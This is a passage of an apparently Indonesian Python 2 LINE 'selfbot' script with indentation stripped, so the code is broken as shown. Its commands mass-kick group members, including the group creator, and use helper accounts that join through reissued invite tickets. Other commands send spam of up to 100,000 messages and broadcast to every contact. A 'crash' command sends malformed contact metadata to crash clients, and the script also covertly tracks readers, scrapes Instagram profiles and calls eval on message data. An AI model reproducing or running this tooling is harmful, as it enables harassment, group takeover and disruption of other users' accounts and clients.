nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Updated")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif msg.text == "CCtv":
cl.sendText(msg.to, "Check sider Eror"),
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
print wait2
elif msg.text == "Toong":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "People who readed %s\nthat's it\n\nPeople who have ignored reads\n%sIt is abnormal \n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n¡¸Cctv¡¹you can send read point will be created ")
#-----------------------------------------------
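# "Crot": tag-all. Builds the member mid list and mentions everyone via the mention() helper (assumed to be defined earlier in this script), then reports the count.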
elif msg.text in ["Crot"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
# mention everyone in batches of 100, assumed to be the per-message limit used by mention()
for i in range(0, jml, 100):
    mention(msg.to, nama[i:i+100])
cnt = Message()
cnt.text = "Hasil Tag : "+str(jml)
cnt.to = msg.to
cl.sendText(msg.to,"TAGALL SUCCESS")
cl.sendMessage(cnt)
#-----------------------------------------------
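# "Kr" / "Kr1-3 join": temporarily open the invite link, reissue a ticket, let the helper bot(s) join by ticket, then close the link again.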
elif msg.text in ["Kr"]:
if msg.from_ in admin or owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki.updateGroup(G)
elif msg.text in ["Kr1 join"]:
if msg.from_ in admin or owner:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
elif msg.text in ["Kr2 join"]:
if msg.from_ in admin or owner:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
#-----------------------------------------------
#.acceptGroupInvitationByTicket(msg.to,Ticket)
elif msg.text in ["Kr3 join"]:
if msg.from_ in admin or owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
print "kicker ok"
G.preventJoinByTicket = True
kc.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["Out","out"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ranita pergi"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ranita bye"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Kr pergi"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Kill"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Fuck You")
cl.sendText(msg.to,"Fuck You")
return
for jj in matched_list:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
print
elif "Glist" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "☄ %s \n" % (cl.getGroup(i).name + " 👥 ▄ [ " + str(len (cl.getGroup(i).members))+" ]")
cl.sendText(msg.to, " ☄ [ ♡List Grup♄ ] ☜\n"+ h +"Total Group ▄" +"[ "+str(len(gid))+" ]")
elif "Cium " in msg.text:
if msg.from_ in admin or owner or mid:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Ready ah" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready ah","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Perintah DiLaksanakan Maaf Kan Saya :v ô")
cl.sendText(msg.to,"Group DiBersihkan.")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
cl.sendText(msg.to,"Group cleanse")
cl.sendText(msg.to,"Group cleanse")
elif msg.text in ["Salam1"]:
cl.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
cl.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif "Salam3" in msg.text:
if msg.from_ in owner:
cl.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"Assalamu'alaikum")
cl.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
cl.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"maaf kalo gak sopan")
cl.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
cl.sendText(msg.to,"hehehhehe")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
cl.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
cl.sendText(msg.to,"Nah salamnya jawab sendiri dah")
elif "Nk " in msg.text:
if msg.from_ in owner:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
cl.sendText(msg.to,"Succes Kick")
cl.sendText(msg.to,"Fuck You"),
elif "Ndang " in msg.text:
if msg.from_ in owner:
nk0 = msg.text.replace("Ndang ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
elif "Blacklist @ " in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
k3.sendText(msg.to,"Succes Van")
except:
cl.sendText(msg.to,"error")
elif "Ban @" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
print "[Ban]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak DiTemukan")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Berhasil Memban")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak DiTemukan")
cl.sendText(msg.to,"Tidak DiTemukan")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Berhasil")
except:
cl.sendText(msg.to,"Berhasil")
#-----------------------------------------------
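# Sider checker: "Cctv" stores a read point in wait2; "Intip" reports who has read past it and resets the point.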
elif msg.text == "Cctv":
cl.sendText(msg.to, "Lurking Is Starting!! "+ datetime.today().strftime('%H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
print wait2
elif msg.text in ["Intip"]:
if msg.toType == 2:
print "\nRead aktif..."
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "Sider :\n =========================== %s\n===========================\n\nReader :\n%s\n===========================\nIn the last seen point:\n[%s]\n===========================" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "\nReading Point Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "lukers"
cl.sendText(msg.to, "Auto Read Point!!" + (wait2['setTime'][msg.to]))
else:
cl.sendText(msg.to, "Ketik [Lurking] for [Lurkers]")
#-------------------------------------
elif "Cn " in msg.text:
if msg.from_ in admin or owner:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"UpdateName => " + string + " <= Success")
#----------------------------
elif "Vk " in msg.text:
if msg.from_ in admin or owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
#-----------------------------------------------
elif msg.text.lower() == 'crash':
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
#-----------------------------------------------
elif msg.text in ["Tes"]:
if msg.from_ in admin or owner:
cl.sendText(msg.to,"Kr Hadir Boss!!")
#-----------------------------------------------
elif msg.text in ["Mode On","mode on"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN ON")
else:
cl.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["Wc"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["Lv"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["autoKick"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick on")
else:
wait["autoKick"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already on")
if wait["tag2"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick on")
else:
cl.sendText(msg.to,"Yang ngeTag Kick on")
else:
wait["tag2"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick on")
else:
cl.sendText(msg.to,"Yang ngeTag Kick on")
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
#=================================================
elif msg.text in ["Mode Off","mode off"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ALREADY OFF")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel oғғ")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect already oғғ")
if wait["Wc"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nayapa yg gabung already oғғ")
if wait["Lv"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nayapa yg left already oғғ")
if wait["autoKick"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick oғғ")
else:
wait["autoKick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick already oғғ")
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Tag off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already Tag off")
if wait["tag2"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick off")
else:
cl.sendText(msg.to,"Yang ngeTag Kick off")
else:
wait["tag2"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang ngeTag Kick off")
else:
cl.sendText(msg.to,"Yang ngeTag Kick off")
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
#===================================================
elif msg.text in ["Qr On","qr on"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr Off","qr off"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
#-----------------------------------------------
elif msg.text in ["Member On"]:
if msg.from_ in admin or owner:
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Member Off"]:
if msg.from_ in admin or owner:
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
#-----------------------------------------------
elif "Kr say " in msg.text:
bctxt = msg.text.replace("Kr say ","")
cl.sendText(msg.to,(bctxt))
cl.sendText(msg.to,(bctxt))
elif ".. " in msg.text:
bctxt = msg.text.replace(".. ","")
cl.sendText(msg.to,(bctxt))
cl.sendText(msg.to,(bctxt))
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "u31ef22df7f538df1d74dc7f756ef1a32"}
cl.sendText(msg.to,"MyCreator")
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': "u9cc2323f5b84f9df880c33aa9f9e3ae1"}
cl.sendText(msg.to,"MyCreator")
cl.sendText(msg.to,"Simanis madu ya!!")
ki.sendMessage(msg)
#-------------Fungsi Creator Finish-----------------#
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
#Vicky Kull~
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
#----------------------------------------------------
elif "Cs " in msg.text:
if msg.from_ in admin or owner:
string = msg.text.replace("Cs","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Done")
#-----------------------------------------------
# elif "say " in msg.text.lower():
# say = msg.text.lower().replace("say ","")
# lang = 'id'
# tts = gTTS(text=say, lang=lang)
# tts.save("hasil.mp3")
# cl.sendAudio(msg.to,"hasil.mp3")
#--------------------
elif 'wiki ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
#-----------------------------------------------
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Mungkin")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-----------------------------------------------
elif "Rate " in msg.text:
tanya = msg.text.replace("Rate ","")
jawab = ("10%","20%","30%","40%","50%","60%","70%","80%","90%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#-----------------------------------------------
elif "Getname @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Getname @","")
_nametarget = _name.rstrip(" ")
gs = cl.getGroup(msg.to)
for h in gs.members:
if _nametarget == h.displayName:
cl.sendText(msg.to,"[DisplayName]:\n" + h.displayName )
else:
pass
elif "Getbio @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Getbio @","")
_nametarget = _name.rstrip(" ")
gs = cl.getGroup(msg.to)
for h in gs.members:
if _nametarget == h.displayName:
cl.sendText(msg.to,"[Status]:\n" + h.statusMessage )
else:
pass
#-----------------------------------------------
#-----------------------------------------------
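# "zodiak <tanggal>": query an external Apps Script endpoint and echo birth date, age, next birthday and zodiac sign (response fields: lahir/usia/ultah/zodiak).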
elif "zodiak " in msg.text:
tanggal = msg.text.replace("zodiak ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia: "+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak)
#-----------------------------------------------
elif msg.text in ["Invite creator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin or owner:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#----------------------------------------------
elif "Stalk " in msg.text:
print "[Command]Stalk executing"
stalkID = msg.text.replace("Stalk ","")
subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
files = glob.glob("tmp/*.jpg")
for file in files:
os.rename(file,"tmp/tmp.jpg")
fileTmp = glob.glob("tmp/tmp.jpg")
if not fileTmp:
cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
print "[Command]Stalk,executed - no image found"
else:
image = upload_tempimage(client)
cl.sendText(msg.to, format(image['link']))
subprocess.call(["sudo","rm","-rf","tmp/tmp.jpg"])
print "[Command]Stalk executed - succes"
#-------------------------------------------------------------
elif "Gbc " in msg.text:
if msg.from_ in admin or owner:
bctxt = msg.text.replace("Gbc ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia, (bctxt))
elif "Pm cast " in msg.text:
if msg.from_ in admin or owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Fbc " in msg.text:
if msg.from_ in admin or owner:
bctxt = msg.text.replace("Fbc ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia, (bctxt))
#----------------------------------------------------------
elif "Meikarta: " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("Meikarta: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#------------------------------------------------------
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#-----------------------------------------------
elif "Getpp @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpp @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#--------------------------------------------
elif msg.text in ["Autolike on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Autolike off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
#------------------------------------------------------------------
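# "Group On/Off": remember or forget the current group's name in wait['pname']/wait['pro_name'] (presumably used by the name-protect logic elsewhere in the script); "Turn off" stops the bot process.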
elif "Group On" in msg.text:
if msg.from_ in admin or owner:
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN ON")
else:
cl.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Group Off" in msg.text:
if msg.from_ in admin or owner:
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ALREADY OFF")
elif "Turn off" in msg.text:
if msg.from_ in admin or owner:
try:
cl.sendText(msg.to, "Bot is Turn Off")
import sys
sys.exit()
except:
pass
#------------------------------------------------------------------
elif msg.text in ["Cancel On"]:
if msg.from_ in admin or owner:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Cancel Off"]:
if msg.from_ in admin or owner:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel oғғ")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ")
#--------------------------
elif msg.text in ["Njoin on"]:
if wait["Wc"] == True:
